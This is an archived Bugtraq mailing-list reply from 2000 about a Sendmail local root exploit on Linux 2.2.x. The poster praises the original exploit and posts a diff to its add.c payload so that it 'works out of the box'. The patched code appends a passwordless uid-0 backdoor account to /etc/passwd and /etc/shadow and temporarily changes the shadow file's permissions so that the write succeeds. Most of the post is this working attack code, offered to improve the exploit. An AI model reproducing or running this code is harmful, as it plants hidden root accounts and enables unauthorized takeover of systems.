[15294] in bugtraq
Re: Sendmail local root exploit on linux 2.2.x
daemon@ATHENA.MIT.EDU (Mark K. Pettit)
Sat Jun 10 04:23:06 2000
Message-Id: <200006081918.MAA10306@grand.yahoo.com>
Date: Thu, 8 Jun 2000 12:18:44 -0700
Reply-To: "Mark K. Pettit" <pettit@YAHOO-INC.COM>
From: "Mark K. Pettit" <pettit@YAHOO-INC.COM>
X-To: sky@REAL-LINUX.DE
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <393F8FDC.882BAEE5@real-linux.de> (message from Florian Heinz on
Thu, 8 Jun 2000 14:21:48 +0200)
>Hello all,
>
>Attached is a file with 2 sources, ex.c and add.c
This is a great exploit. It is a little broken, though. Here's a
patched version of the add.c script so that it is a little kinder and
works out of the box the first time.
The problem has to do with the permissions on the shadow file. If it's
installed with mode 400, the exploit will fail. There's also a \n left
out of the shadow line.
This patch fixes both of these problems. Yah, I know it's trivial, but
I wanted to be complete.
============================================================================
--- add.c.orig Thu Jun 8 11:32:33 2000
+++ add.c Thu Jun 8 11:21:15 2000
@@ -1,17 +1,24 @@
#include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>
int main (void) {
int fd;
char string[40];
+ struct stat buf;
seteuid(0);
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
+ stat("/etc/shadow", &buf);
+ chmod("/etc/shadow", S_IRUSR|S_IWUSR);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
- strcpy(string, "yomama::11029:0:99999:7:::");
+ strcpy(string, "yomama::11029:0:99999:7:::\n");
write(fd, string, strlen(string));
close(fd);
-
+ chmod("/etc/shadow", buf.st_mode);
}
============================================================================
--
Mark K. Pettit, CCNA Do you, uh, Yahoo!?
pettit@yahoo-inc.com Why, yes, I do, uh, Yahoo!
Technical Yahoo
Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051
